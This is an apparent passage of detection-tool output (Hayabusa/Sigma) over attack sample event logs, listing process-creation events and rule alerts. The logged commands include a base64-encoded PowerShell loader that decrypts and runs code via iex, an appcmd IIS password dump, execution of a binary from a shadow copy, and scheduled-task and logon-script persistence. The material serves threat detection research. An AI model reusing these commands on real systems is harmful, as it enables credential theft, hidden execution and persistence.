wAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.555 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir "". )"" /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-28 00:12:38.241 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c whoami /groups   :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:38.290 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami  /groups   :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c whoami /groups ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:38.290 +09:00,IEWIN7,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:43.990 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:44.055 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe  /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:45.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:45.491 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe  /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:47.402 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:47.478 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe  /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\""  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:48.655 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume""   :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:48.763 +09:00,IEWIN7,1,informational,Process Creation,"Command: vssadmin  List Shadows  :  Path: C:\Windows\System32\vssadmin.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:48.827 +09:00,IEWIN7,1,informational,Process Creation,"Command: find  ""Shadow Copy Volume""   :  Path: C:\Windows\System32\find.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.447 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe   :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.544 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmic.exe  process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe   :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Suspicious WMI Execution,,rules/sigma/process_creation/win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.632 +09:00,IEWIN7,1,informational,Process Creation,Command: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe  :  Path: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:59.519 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management  :  Command: C:\Windows\system32\schtasks.exe  /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe""   :  Path: C:\Windows\System32\schtasks.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 11:13:52.171 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe  -nw -exec=c:\windows\System32\osk.exe c:\  :  Path: C:\ProgramData\vshadow.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM  :  Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590""  :  Path: C:\Windows\System32\drvinst.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:13:53.507 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: IEWIN7\IEUser  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:14:48.819 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe  -nw -exec=c:\windows\System32\notepad.exe c:\  :  Path: C:\ProgramData\vshadow.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM  :  Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0""  :  Path: C:\Windows\System32\drvinst.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:14:50.413 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\System32\notepad.exe""  :  Path: C:\Windows\System32\notepad.exe  :  User: IEWIN7\IEUser  :  Parent Command: vshadow.exe  -nw -exec=c:\windows\System32\notepad.exe c:\",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-06-15 07:22:17.988 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe""   :  Path: C:\Users\IEUser\Downloads\a.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:21.535 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe""  :  Path: C:\Users\IEUser\Downloads\a.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\a.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:31.957 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:32.222 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp""  :  Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\a.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:47.253 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:55.441 +09:00,IEWIN7,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 00000040   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:55.503 +09:00,IEWIN7,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:55.566 +09:00,IEWIN7,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:55.707 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:06.691 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}  :  Path: C:\Windows\System32\dllhost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:07.019 +09:00,IEWIN7,1,informational,Process Creation,Command: efsui.exe /efs /keybackup  :  Path: C:\Windows\System32\efsui.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:07.082 +09:00,IEWIN7,1,informational,Process Creation,Command: atbroker.exe  :  Path: C:\Windows\System32\AtBroker.exe  :  User: IEWIN7\IEUser  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.894 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe  :  Path: C:\Windows\System32\userinit.exe  :  User: IEWIN7\IEUser  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.957 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""  :  Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\userinit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Suspicious Userinit Child Process,,rules/sigma/process_creation/win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.972 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE  :  Path: C:\Windows\explorer.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:15.054 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\VBoxTray.exe""   :  Path: C:\Windows\System32\VBoxTray.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
